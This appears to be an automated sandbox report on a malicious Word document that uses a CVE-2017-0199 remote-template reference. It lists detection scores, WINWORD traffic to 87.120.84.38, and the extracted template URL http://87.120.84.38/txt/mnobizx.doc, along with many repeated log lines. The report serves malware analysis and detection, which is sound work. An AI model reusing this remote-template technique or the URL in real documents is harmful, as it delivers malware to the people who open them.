Windows Analysis Report
PO Ref673947.docx.doc

Overview

General Information

Sample name: PO Ref673947.docx.doc
Analysis ID: 1538501
MD5: a16ddd1a4f147371f7ee5866e62c42e4
SHA1: d75b092d8d70fcf3c2ab1664541e62cf588233b8
SHA256: 16b9d6d20aad04572a72b4870886478b491d840d505066ebb85d0f6b5accd1ad
Tags: CVE-2017-0199docuser-lowmal3
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Contains an external reference to another file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

barindex
Source: PO Ref673947.docx.doc Avira: detected
Source: PO Ref673947.docx.doc ReversingLabs: Detection: 58%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
Source: Joe Sandbox View IP Address: 87.120.84.38 87.120.84.38
Source: Joe Sandbox View ASN Name: SHARCOM-ASBG SHARCOM-ASBG
Source: global traffic HTTP traffic detected: GET /txt/mnobizx.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 87.120.84.38Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46851DD0-0074-4A23-8C8F-D9855D70FA2D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /txt/mnobizx.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 87.120.84.38Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:24:04 GMTContent-Type: text/html; charset=iso-8859-1Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:24:04 GMTContent-Type: text/html; charset=iso-8859-1Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Mon, 21 Oct 2024 11:24:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 4f c1 4a c4 30 14 bc f7 2b 9e 7b d2 83 79 6d 0d d8 43 08 ac db 2e 2e d4 b5 68 7a f0 98 dd 3c c9 c2 da d4 24 55 fc 7b d3 2e 82 97 07 33 6f 66 98 11 57 f5 f3 46 bd 75 0d 3c aa a7 16 ba fe a1 dd 6d 60 75 8b b8 6b d4 16 b1 56 f5 e5 53 b2 1c b1 d9 af 64 26 6c fc 38 4b 61 49 9b 04 e2 29 9e 49 f2 9c c3 de 45 d8 ba 69 30 02 2f 64 26 70 11 89 83 33 3f b3 af 90 ff 34 09 65 62 94 ca 12 78 fa 9c 28 44 32 d0 bf b4 f0 ad 03 0c 29 eb 7d ce 02 37 40 b4 a7 00 81 fc 17 79 26 70 9c 93 7c 3a da 18 4f 21 c8 f5 a8 8f 96 b0 64 9c f1 02 ae fb c3 34 c4 e9 06 5e 17 03 e8 08 d5 3d 2b ca 9c 55 9c dd 55 d0 39 9f 98 5c e0 9f 3d b5 5c fa a5 b2 f3 ae ec 17 81 af 29 7c 12 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MOJ0+{ymC..hz<$U{.3ofWFu<m`ukVSd&l8KaI)IEi0/d&p3?4ebx(D2)}7@y&p|:O!d4^=+UU9\=\)|0
Source: ~WRF{89310996-9060-451D-8235-D2328ED63C79}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal72.evad.winDOC@1/12@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ Ref673947.docx.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA4D6.tmp Jump to behavior
Source: PO Ref673947.docx.doc OLE indicator, Word Document stream: true
Source: ~WRF{89310996-9060-451D-8235-D2328ED63C79}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{89310996-9060-451D-8235-D2328ED63C79}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{89310996-9060-451D-8235-D2328ED63C79}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: PO Ref673947.docx.doc ReversingLabs: Detection: 58%
Source: PO Ref673947.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\PO Ref673947.docx.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PO Ref673947.docx.doc Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: PO Ref673947.docx.doc Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\87.120.84.38\DavWWWRoot Jump to behavior
Source: settings.xml.rels Extracted files from sample: http://87.120.84.38/txt/mnobizx.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs